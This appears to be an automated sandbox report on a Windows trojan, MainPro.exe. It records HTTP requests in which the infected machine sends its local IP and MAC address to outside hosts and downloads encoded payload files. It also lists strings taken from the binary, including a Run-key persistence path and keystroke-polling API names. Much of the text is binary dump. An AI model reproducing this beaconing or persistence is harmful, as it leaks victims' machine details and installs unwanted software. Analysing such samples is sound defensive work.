......"a...Q...M}..V.."j..'...&.../...&...1...8...;[email protected]...#...)...
.....s...[...>...-x..)m..&].."S.."K...C...<...*...'...&...#... .
.................................................. ..(5...............
..............."..."......................................%i.h!d..#l..
(}.. ...-... ...-...,...).../...-...-...8...7...9...D...;o..%Q...F...K
...M...6...&i..$V.. [email protected]...*...*...,...,...0...3...-...%... .....
...................../W..-I..............."..*>..1F../@..1<..19.
../..($..#.....................h........,w..*|..,.../.......,... ...-.
..-...*...%...'...,...-.../...1...3...?...Q...K...*f..!^...R...5...)u.
.&\.."N..#I...;...<...@...@.. A.. B...;...3.......-...0........
<<< skipped >>>

GET /desk/ico/190.ico HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pro.52icafe.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Sat, 04 Apr 2015 03:50:29 GMT
Content-Type: image/x-icon
Content-Length: 16958
Last-Modified: Thu, 12 Feb 2015 06:55:50 GMT
ETag: "54dc4e76-423e"
Expires: Sun, 05 Apr 2015 03:50:29 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes
Age: 54191
Powered-By-ChinaCache: HIT from 060320b3SX
......@@.... .(B......(...@......... ......B..........................
............0ET-..,..%F..d...~........................................
......................................................................
.....................................................................~
...b...7W...'...%0....................................Mo..If..........
....2...'g...Dd..Bl..Q..!S...Ou..a~..q..D...4...#...,...(...*.../...-.
......#.......................................(...(.../...1...3...%...
........6...4...&...X...9....Wx..[~..Xw..[y..o...............2U..(,...
......................:f.*. >..:^.........................CSv...'.C
Sv.0?`...6............. GS.0Pa.Dn..............`......................
.....7...........T............&;.................W....DZ.........f....
.....J..&A...4..'F.. 6.. 1.......;..........?V...... "-.............a.
..1T..v.......@\...).Vl~................../P.6Hh.r.....8... .....$3:..
26.X{...............CT.."4.................C....m...|..X...p...k......
[email protected]...@S.`[email protected]... ..
. ..! ......)).Pu.......^...... .&..........D`..Go......6[..&=...,...&
.-GT.X~..............9Tw......"8...&.JZb...".->B.(AM..3E.. ?.."7.. 
[email protected]........... ^}..b...k..1...9...'z...........F_..:S..(>.../..
./.."5..1=..=L."DQ.i...^w..................n....C[..!7...)...%.....t|~
../K......Ge.#.!......=W0.Ah......<f..(G...7...4...(...%.$EU.......
.......3M.Pv....!...*..%-..... 38..!,.../...'..%8..6P..7O..H\.^..../I.
'j..`...`...D...p...>....e..<{..'Xz..-A..&9...%...#.......(.
<<< skipped >>>

GET /desk/ico/184.ico HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pro.52icafe.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Sat, 04 Apr 2015 07:24:58 GMT
Content-Type: image/x-icon
Content-Length: 16958
Last-Modified: Tue, 27 Jan 2015 08:43:08 GMT
ETag: "54c74f9c-423e"
Expires: Sun, 05 Apr 2015 07:24:58 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes
Age: 41322
Powered-By-ChinaCache: HIT from 060320b3SX
......@@.... .(B......(...@......... ......@..................### ###4
###H###Z###r###.###.""".###.###.###.###.###.###.###.###.###.###.###.##
#.###.###.###.###.###.###.###.###.###.###.###.###.###.##$.##%.##%.##%.
$$'.$$'.$$(.%%).%%*.''..''/.('0.))2.**5. *7., :.-,=..-?.0/B.0/C.20F.21
H.43L.64N.96S.@=_.HElvPMxh_Z.Zoi.J.}.>###6###N###p###./%*.?&0.E'0.F
(1.G)2.H)2.H)2.I*3.J*3.J*3.K*4.K*2.L 3.L 4.M 4.M 4.N,4.N,4.O,4.O-4.P-5
.P,4.P,4.P,3.Q,4.Q-4.Q-5.R-5.R-5.Q-5.Q-5.P,4.Q-5.P-6.P-7.Q.8.P-7.P.8.P
-9.P.;.P.;.P.<.P.=.P.>[email protected]/B.Q0D.Q0F.Q0F.P0G.P/H.O/H.K.J.;
/J.55Q.EBh.RO}pb].\yr.J###H"##t1$*.b&9..(D..-K..3P..7T..9V..;X..<W.
.>Z..?Y..@[..A\..B[..B[..CZ..E\..F]..G]..G]..H]..H]..I]..I]..J]..K]
..K]..L^..M_..M_..M_..L_..L_..L^..L_..K_..J`..J_..J_..Ia..J`..Ia..Ia..
Ha..Gb..Fb..Gd..Fe..Fe..Ef..Df..Ce..Af..?d..:b..4_../[email protected].
nmg.Z###^6$*.~ ;..$C..,J..3P..8V..<Y..?\..A^..C^..D_..D]..F_..G`..G
^..H_..I`..Ja..Ka..Kb..K`..Mb..Mb..Na..Oa..Pa..Pb..Pa..Pb..Qb..Rc..Qb.
.Qc..Qb..Qc..Qd..Qc..Pd..Pd..Od..Od..Ne..Of..Ng..Ng..Mg..Mh..Mi..Lj..M
j..Lk..Kl..Jl..Hl..Fj..Bh..;d..3_..*Y..(U.H5Y.SO~.ga.h %).t.8...=..(F.
.1N..7T..=Z..B]..D`..Fa..Ga..Ic..Ib..Jc..Kc..Lc..Mc..Nd..Od..Pd..Pe..Q
d..Qd..Re..Se..Sf..Td..Ue..Ud..Ud..Ue..Ve..Ue..Ue..Ve..Vf..Uf..Ug..Ug.
.Uh..Uh..Tg..Si..Tj..Tk..Sk..Sl..Sm..Sn..Rn..So..Ro..Qq..Pp..Or..Lp..H
m..Bj..9c..0]..$W..(W.LDn.c^.tL"3...7.."@..,K..4R..;X..A_..Ea..Hd..Id.
.Kf..Lf..Me..Ng..Nf..Of..Pg..Qg..Sh..Sh..Sh..Sh..Uh..Uh..Vh..Wg..Vf..W
h..Xh..Xh..Xh..Zh..Yh..Yh..Yi..Yj..Xh..Yj..Yk..Xk..Xl..Xk..Wm..Xn.
<<< skipped >>>


GET /plus/config/wuwei8896.1.bin?ver=3.180&lip=192.168.220.134&mac=000C293FC930 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: plus.zzinfor.cn
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.3
Date: Sat, 04 Apr 2015 18:52:49 GMT
Content-Type: application/octet-stream
Content-Length: 1687
Connection: close
Expires: Sat, 04 Apr 2015 18:52:49 GMT
Cache-Control: max-age=0
....<.......`.......X..HXO>B..........................,......T..
mz3nU....J..&jG..KCW...O.m8s09j?`h?m<$R............................
.........................................................v...`....g.{.
U.%..O..e......................./.....................................
....................O^EL..%7<m0-Ck.,GW.p...`U..~-.".~. -.....9.....
5-:hyFXNjm,qh5.` .....................................................
..................n...........Q...Y..?..U.................... ........
..........................................ff4pb7l{2)Y.^ {..her^.......
.Y#.........3.c.....>mz(9..JB.(t>...p,...f.5$X.f3#LOV..[Gz5|w($u
4$oQ_.[Y..x28/5`dV.6j.....j...tf..h..I@....^.M........er../w1(c...Cdon
....h4....19*t?.{k$..A.Bls.tv6H.'7*mewg<p..X..._Q...rj:i.".J......h
...h>....J......YX....u....'Xzh2z(g/77*,<v?`Rm4.................
...........................................j..........UU....'.&Pw.....
.he.YCqy9..IUXNf%.LK`5................................................
.............h....,......W'...i..2N.0.......................4.........
...................................................f...$...JH.......=@
.8.Q.....à>&.KNlls0%JKuq.3...STDrsz4mj u&;<7jG8%s=:.=(t1)}mr|(
T....f?1y(0=%2}Dv......c.......wS:.)<.Q.ktQ.E......ycQ..7k)....Zd8k
2...!.5$X.fx=;8/tdJA.ki%;p9".NL.RCV. 4`{=%(;-x>$RGb[Br.....r...`%!.
Vd.HnYa..GW.........:[email protected]}8).x\b>u ...E._.WJ.XEMY.]./kf%.&
gt;y.OD{'}~jT.S.X...L.Cz$.....-93$8wu$>K.Z.udDX....@..'...y...[.u..
..(..............-................................................
<<< skipped >>>


GET /txt/listsf_20150403180242.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=6800044940E2E0AB155EC34DEDF2EFE7 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: sc.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 04 Apr 2015 18:54:29 GMT
Content-Type: text/plain
Content-Length: 943732
Last-Modified: Fri, 03 Apr 2015 10:02:43 GMT
Connection: close
ETag: "551e6543-e6674"
Accept-Ranges: bytes
fb5EWIYv9SGmfkw3suNrnMDH6q7RnjROdajLffC7CLAARuVDFElV4lEjSkzOz/kAlpGS V
xJ6wCxq3njHLHGDrSpd4t9GUG/XenWQ2aIx2jsui0o8oZPf LOn2ww/Npy2/VNK6uLArY 
2DOaLZnkRwmT/bQFdsn0vTxPrhlCcFy k 20AuZlNpLR5W3egF9UDl Z5p lIkp5QaoNWO
/91c1pXUqdcHQR1dHg92w1v/LGlOT0VJAnJ36Js9TQHPrsujnxEp37 HoD5p/PsyBOfMwD
GEoMtRE5ky9HGzVzp2Oj9/H/lH7C6KbqybZ8CFAAC pK9yNnlse88CyAWsKq19UQycMmZK
WFjKsOwfP4K/6iD9wJ7Q56a76E0//4vK0u/k5TIUnKG9bYZGLV4s1PfX/O4rQwerqn4jIe
PUlfjQi7CkoCiNgdta2vxUFTm9wh1nz0osLYhQnt4il0RRuD6aN0TYaR3XP6XeBJFn9uuo
FBmIvo/wiM6gBmct5GdqTfYBe7DnRXLQtZgVvPcKlAIkefOq5hEex1DN eLPXJa2a7bghg
MlW7mipls1mJHc9ys4/xs 9meRS3JrCz1veY7nhfcNRYLXROExXv1iYv6H WhriQyigJVi
zQXrcet8OpvLBHz2fi2n7hNNq286slic3Vd8/gntSCmepuWtO7BES 6SzN5DNTolAKPUQ4
qj4b0 U0pb5crra/r/mz/jOnC KIhUoLtqKkssNOWnRvjyTUoNWVN4A0pbpyHrxR6tC8Oc
T3RwWMW6/n6qNjk30mm3OARwLBhlR5oaMFHGYkFxgWqvFgeDRDL7zL6f/FuMd4R Iq6EE2
YHT2ed7WtaL5Un MmEmt7WfYsbNq14DBberjBkyE7HHNExPF2vULtCIHA1P0yh12RkIe 8
Tt8oBpNsEa1DMhJUop/jxtH1Ny2d9l/ELtGCOteiO9lMcs552QIUMfhXfFegIzdf3kHKiz
DVJa5b0guBCq40ru1AQKUlim2dLDDLQEHl4NaJfMzZkWqoQJS5WZoSI634lqP3IeRpPe/w
CtnfZw6NqhAfAo5rXb1SP1lTTXFsU69YlE6i0dfomz1NAc uxYI7knJsBotL9vUWdQMPNx
D9xMIdLl1wSPq9U7sIHH9NvNQlxdA0qVKIPEpO Off6RBAeAGR1Wnmntsj/CxA6g1enx C
BeybNbpcjLWBG62lzyGFUYDXvo7Q71lU9iWi6TDFgNKi3yp9Sott3AI5 M281CXF0DSpWg
GKc8YJkZNEoMU2ddoj8MIAcZrtk/HfiCp9o3sgQnA4Y/L2IrekaSXG5AHOfPhajoVqg8Yf
VY3NJKUsceCuFZzEKdCo4H8TnNJhxH3 uueYJ/GG6CXRUzPYwhIxxG 0nt7ewSAOl4BiiV
TPgfum562uZCJljJXaUDZOOUBVYyUtBkC9 1LadbFH/j9zrQCwkudOuqG3c 8270rQ16n/
dwiQ27OB4y9G /I0/ooFLXIncYYvJ TUIb6oo9QRCtQJDRnPxQd8p2io6k riaE8UE
<<< skipped >>>


GET /txt/listbc_20150404215834.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=89C04AF80E849FEC0059588AF9D40675 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: sc.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 04 Apr 2015 18:54:32 GMT
Content-Type: text/plain
Content-Length: 671336
Last-Modified: Sat, 04 Apr 2015 13:58:36 GMT
Connection: close
ETag: "551fee0c-a3e68"
Accept-Ranges: bytes
fb5EWIYv9SGmfkw3suNrnMDH6q7RnjROdajLffC7CLCs7GeQSgT0LMSbeMnDrAUu1dbIAT
I0j4FGOPHCp5fsPM5bcpV9gVv8YkHx4yvOvi PhjnvseNCjxbHglVJKEsfQC1ZE3OCWcvz
QbmwCDTQERo7OM0Dsq9ls0obQpmD2yxPW1UfPcgCHpTPb8Y2RJ4h/W/IUoPzmCxZDs116M
O2q4P28tueyzvM3jq1nHFshfdphDeIwHThmFssE0A1Pr4qHrkZJuBKno3KVx3e0jT3j7ZH
TLmq9Cl15DrYBrHijmrQsV7P5Z v11HmVz3qARYsHSgvX2p93mW75tcyo4i4cXSuNqV4Xl
CaXso7ucBG/H8fRAKUsrrkw9cIameaUKTw7jvW91i66L0GHh4/uwcqQAzybLIfRfffCP/ 
17vZdFfb6am/3VfiqTYvvjyZX3zDmv9KP2Ld4kfjefKFmYzZb1buJgIcHQNVbkQZmMyyQo
6vEiUh7DzU7sPkgD2j rwITlxQHJ3qG7Rpz96fvejf3yKyAB2Jt SMsvYR0z2VvfIf8bxW
NgKAWXbaeVELwBRK8y4wi4j24JjQJjG7u1Xpc5BtwjuJa5ySDSOGD1cslwsCTpfSGIAzrg
5HBpIqJBlEkioafCimRbx22nlRC8AUSnBowDXDoKSEdNfCrOXZCTq4Sj4Di7/mMhRuCyyH
dlaqmF5IXbe8jUOlHkCWEyyB8EbpRg6Mp331mmV3Mb 5zbyPLM3/6iQm5UrxEOLXuVD1r1
u6bdoOojUF7Y6WmItj5oHy6K2rbfQog/by257LO8xjNEqzdFfuTWr7rSlxGJXdF7APbjAq
 bJRB7Gd653cwvAQvd9Aa1auBq3HUOen06T f/tYFXf2j6SEdPZ1RXXp X/ILlgTB/IlcG
yaRE855xyxyNcTnnljCMeXNabM6EJtexlvw0QqHfPaDkpX7FoA8KoHVtopXClCn/RU3pLq
M2LFIgz7JD72wxKdPaxzM4BkCNtiAICqlEO9OfJCW577Zvn28WWptiBje 20jAcFOdEoP/
5MnsYKUfxNU8niCc1p2iz2nuCC6kPvRXzm0N73Yp5 Wk57QxbMGb 5UsBy5EfQBl7W0q6I
tuztwyIIngRqIHDtl90EbCKrd5G62qqT6akyZfoWywKcMQLBRp1gDmKeflpOe0MWLAEQt8
baZ6xH0AZe1tKuiKUeQJYTLIHwH57K0OgyuqQtwICxpqtm1hJB1xQGpBMP/Ju6HhpnFOGG
Py9iK3pGknANK6Jryn2TRHfgDB5emdpinn5aTntDFuMoeDl4A2Iby8vtL8r1JM6l/brt2H
MUr3SctnX3LoYwJhyjVKOZ2dAWzEnlu9MIT0hDq2HuubrbVburqa5rTZvM58h61Wi7LMla
egKszfeg3DPXFjbdvLYgZ9Xj4X6coUWXdkdHVcKFAFG8WoEkDEEvH//zIJYifeY8DthlBx
GVGj3DhG0P1ayqqY8pjKyF3WEs13BbTHXtW1dtOpfjV9LmwbmiS xQvfa5RqidBudg
<<< skipped >>>


GET /txt/multi_150401a.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=F1C5E71158F2AA48584F3E420C9C8905 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: sc.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 04 Apr 2015 18:54:20 GMT
Content-Type: text/plain
Content-Length: 1160544
Last-Modified: Wed, 01 Apr 2015 09:48:49 GMT
Connection: close
ETag: "551bbf01-11b560"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WsUwC6UEPuUHwksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnIP fm 1kX2EpoHPH5y5fSneWMVIcz20hnNCxGkQA
G516OSetD3NWwIMVujg9tENOcBTmBWb 7G4WvM1YMoYBR1n/05aTY1HqnuPhzq4dW5N1Tl
rsSqOdfLX98HF1wgyOXjTHacUFiklRw1yD51UqgiV0AoG /mZXPE2s0NmUj5a8TazQ2ZSP
lrueKHSyn HxIR1SJjLO74XPdg0 sDpLF95oztb rsJOq s8Ysjc2A1NnrHs9IEB3ze0Rr
wsy6d8uXJyfQNpBOtYm ARi1SoBtib4BGLVKgG2aGS9/2lLN2w/TTJNbMs336wxom51VeV
brDGibnVV5VlEmG8hVGu5ExNrNDZlI WtxVTKO98tU Ulb6xRQPYFcxNrNDZlI WvE2s0N
mUj5axzbXR wlUOd1udoPMpY2p/E2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8
TazQ2ZSPlrQFU4iLP8df/E2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvoEO8sXymTr0E5EPM1
0K1G5zDifOE4dhzE2s0NmUj5azE4dSQE6hF3aV6mEpZjZPWRFLQzZfoQutxncZxUXidxxN
rNDZlI WvqkpwmtYwEg/WqE7QcsrWW69CtAj1kY2R5672j5HZoq8TazQ2ZSPlrcLYj0lqr
lCI/Rp3LuKWWWC8u eJPQb0XAiYgGUqBt3rE2s0NmUj5a qSnCa1jASD 8BgGQTR5rUy /
T2K3JHIn9Bu0mkYE 2xNrNDZlI WtlbVeP21o8lsTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5
a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmU
j5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a80g7PwSDjpK2E0E4cxijhRTosG6X1WJKNGb
DqOkocKG/Y20xSgdf/GrTzUSVsP2Z2R5x49eQN1kRmLhlwYHh/dn/gQ8oBRhRViFvkyNjI
9EkZX9CUqPKznL5y1ptSZhF6sYrYY HE8uCwOxCHfECwTHNJHVo7OQn5LioQCSs4YA
<<< skipped >>>


GET /txt/deskico_20140926.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=F567147B1655CC25D70B4FAAF165D793 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: sc.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 04 Apr 2015 18:54:22 GMT
Content-Type: text/plain
Content-Length: 398688
Last-Modified: Fri, 26 Sep 2014 07:22:57 GMT
Connection: close
ETag: "54251451-61560"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI Wu7vg7o4OGLvAksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnLCp18hqxqUIH4hxrH2ruxBV4YQeeGJ65c5wsyHzR
sh93kB/WAmaBgr2iApK/YyECWTZc3fHJpIC6vUQIdftw8fH Vki2LxKVQX QpVKPU/IIqA
08 jlafX7oH6YXj9Lg9vljEjQvyO2cTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a X5Vy1wuS
R9dgNryH0CP/d9OaA4pTXvaLuA  FC6PJMNxIkW4hj6Qlxo55q3drEIlgh1fMm3K29506a
W9b6VGbm/H8aJaRsqeb8fxolpGyp0Wl 66XOXiKtj4tOAGKUF sMaJudVXlW6wxom51VeV
ZRJhvIVRruRMTazQ2ZSPlrKF9xt0oWC4pNX9iA4EJt cTazQ2ZSPlrxNrNDZlI WvE2s0N
mUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a3
r6RMlL8piAxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr6BDvLF8pk6 4Z HXUJYjwhZJR2tC
FCa1xNrNDZlI WsxOHUkBOoRd2lephKWY2T1OF1I1jh1m7N8KoHU8nB51sTazQ2ZSPlr6p
KcJrWMBIP1qhO0HLK1lqHsBdnJ2u6Qm0Tw5nyxlSrE2s0NmUj5a3C2I9Jaq5QiP0ady7il
llhKe0c7qPxslDsLwTz3lb30xNrNDZlI WvqkpwmtYwEg8TazQ2ZSPlrxNrNDZlI WvE2s
0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5
a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmU
j5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8Ta
zQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSP
lrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

MainPro.exe_604:

.text
`.rdata
@.data
.rsrc
RSSSSSSh
FtPh"
FtPh,
u'SSh |B
Hx.SHx
Uxs.Ux
bx,IfxkFfxÿx
%s (%s:%d)
%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\afxwin1.inl
psapi.dll
games.exb
UserIP.ipb
ntdll.dll
SOFTWARE\Microsoft\Windows\CurrentVersion
x-x-x-x-x-x
serverport
clientport
\BCmain.exe
cnkftpserver
hXXp://%s/main_ad.html
ad%d.func2.cn
KERNEL32.DLL
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
AnnxePro.exe
MainPro.exe
\mswnsock.dll
\mswinsock.dll
%H,%A,%S,%B,%d,%D,%M,%m,%Y
%s\$sctemp%d.tmp
SYSTEM\CurrentControlSet\Services\WinSock2\TCPIPSH
%u.%u.%u
IeImgSnd.dll
IEXPLORE.exe
iexplore.exe
ad.adb
userip.ipb
CWebBrowser2
mfc90.dll
MSVCR90.dll
_amsg_exit
_acmdln
_crt_debugger_hook
GetWindowsDirectoryA
KERNEL32.dll
UnhookWindowsHookEx
ExitWindowsEx
GetAsyncKeyState
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyA
ADVAPI32.dll
ShellExecuteExA
SHELL32.dll
COMCTL32.dll
ole32.dll
MSVCP90.dll
WS2_32.dll
IPHLPAPI.DLL
WINMM.dll
GetProcessHeap
.PAVCException@@
.?AVCCmdTarget@@
;3 #>6.&
'2, / 0&7!4-)1#
.PAVCInternetException@@
.?AVCWebBrowser2@@
.?AVCUDPComm@@
Bogus message code %d
Invalid component ID %d in SOS
IDCT output block size %d not supported
Wrong JPEG library version: library is %d, caller expects %d
Invalid memory pool code %d
Unsupported JPEG data precision %d
Invalid progressive parameters Ss=%d Se=%d Ah=%d Al=%d
Invalid progressive parameters at scan script entry %d
Invalid scan script at entry %d
Improper call to JPEG library in state %d
JPEG parameter struct mismatch: library thinks size is %u, caller expects %u
Buffer passed to JPEG library is too small
Too many color components: %d, max %d
Unsupported color conversion request
Bogus DAC index %d
Bogus DAC value 0x%x
Bogus DHT index %d
Bogus DQT index %d
Empty JPEG image (DNL not supported)
Maximum supported image dimension is %u pixels
Cannot transcode due to multiple use of quantization table %d
Backing store not supported
Huffman table 0xx was not defined
Quantization table 0xx was not defined
Not a JPEG file: starts with 0xx 0xx
Insufficient memory (case %d)
Cannot quantize more than %d color components
Cannot quantize to fewer than %d colors
Cannot quantize to more than %d colors
Unsupported JPEG process: SOF type 0xx
Failed to create temporary file %s
Unsupported marker type 0xx
Adobe APP14 marker: version %d, flags 0xx 0xx, transform %d
Unknown APP0 marker (not JFIF), length %u
Unknown APP14 marker (not Adobe), length %u
Define Arithmetic Table 0xx: 0xx
Define Huffman Table 0xx
Define Quantization Table %d precision %d
Define Restart Interval %u
Freed EMS handle %u
Obtained EMS handle %u
= = = = = = = =
JFIF APP0 marker, density %dx%d %d
Warning: thumbnail image size does not match data length %u
Unknown JFIF minor revision number %d.d
with %d x %d thumbnail image
Skipping marker 0xx, length %u
Unexpected marker 0xx
%4u %4u %4u %4u %4u %4u %4u %4u
Quantizing to %d = %d*%d*%d colors
Quantizing to %d colors
Selected %d colors for quantization
At marker 0xx, recovery action %d
RST%d
Smoothing not supported with nonstandard sampling ratios
Start Of Frame 0xx: width=%u, height=%u, components=%d
Component %d: %dhx%dv q=%d
Start Of Scan: %d components
Component %d: dc=%d ac=%d
Ss=%d, Se=%d, Ah=%d, Al=%d
Closed temporary file %s
Opened temporary file %s
Unrecognized component IDs %d %d %d, assuming YCbCr
Freed XMS handle %u
Obtained XMS handle %u
Unknown Adobe color transform code %d
Inconsistent progression sequence for component %d coefficient %d
Corrupt JPEG data: %u extraneous bytes before marker 0xx
Warning: unknown JFIF revision number %d.d
Corrupt JPEG data: found marker 0xx instead of RST%d
%ld%c
688688688
.2688688688688688
.2688688
^['Vc%Xa Tg X_2]m2aj2dj1Zk2gj1]k1_k2ej1Xk2ri3ek4hk1Zj3ik5\e4r\4_o5g[3qc3]]-amNfc8me3e^6`f0Ya7g`1Zf6f`=[d;Zf6h`6WiEmY1Zb1_^FkZ9jY<bm>[`>lU2Xj5oXEb[Fj^>lc=n^>lbBlZ@n[5iW?eSEj^Gi^?gU<lXAgV>jW=jWAfV<lX?dV;eU?lYFl]>mZ>dU<eU?lYCfW6kZ7]W?fR7fQBcU8gR4jQ@QL;_P5jR7jR1]P-MN3dQ2WP4bV)U;-TF ]97cV,UA VD Y;-UI6U<;QB)\0 [2 [2*]11K9.S63G; [2 [2 [2 Z32G8 N,2M:*]1-Y4<H<*\1 [2 [2*OA [3,[3'Y(1F7,X4 [2,\0*Q?*W5'W& U:*S< \1 [1,X;-UG*\..UJ,X8/RQ/RP/QR-X6*RM
YX.QS
w`zuFra<w_Qng4o]MreHue>xbKf[Eo_Hl]>}dLf[=u_CbRIqc:oXLcY9hR8iSIeX@gV9iS9iT9iT:hU:hU;iV;jW:lV:jV:lW;iV;lX;kX;kY8kR2bA;n[;iV:jU/a><lZ;iV;jW2b?:iU=m[4aC7iO<lY;kX=m[3dB8hO3cE7gM4cE<lZ;kX:iU;kU;iV;lU:pa:mY:nZ:nZ8ob:o]<iT=kU<kU:jU3b>=mY<lW<lX?lU4gV.dU>p^)eZ5gU g[/h]1k\:p_)hb1l`/lb ib4na-jb1lb
b`8jW)ib1l`/j`*qm3pd)pl1ph/ri*h`3na*jd/i]2fV9\R3m_ ib.kc2iW(g`8pc9wp)kg1j^:vk0k`,ja i`1ql)hb4k]
.2*46 13
,0$25'35
03 2:)33!3@ 29,56
u7uh.oj6oe,xv=
/=!3@"3@
09$4> 12
1<%5I,8I$<F1:D FR*:N.JP 5J.:G0FK-9H1;C/CK-6G*5=
04(48#3:(35
19
02 13$24
28L,6@$4D07=
2H_#4E
6jZ.SQ-SS:ign
-0!2?-GR.IT/HS-JT&:Q
.="3B#4H#4K&5I*8P%5G'6K&5I)7N*<O)7N*:N,DP)7N*;N,GR,GQ-LS.KR(8O,7N"3>"3>!3=-7F.7A'4=*6F48?'5C37:&5@ 5<
/1/56!24$34
.D#?D*>R)9S/OS.MT-MT3KT.IV)6O,8R
*,8?=99!02
0D_&6J)5M'9S;PdPXsjfnYi|Xrnjl
bdi.HR
 467137345
 1.II}
P]v.MU 6K,7I(7P):O$:M.CM;FM9@S-4G$:L'8I)5I(7Q.7E08B(6R"3G"3J#3C17C$6L!16*6I,59!4C!/A
`d%d`M
/O4<Q.CP
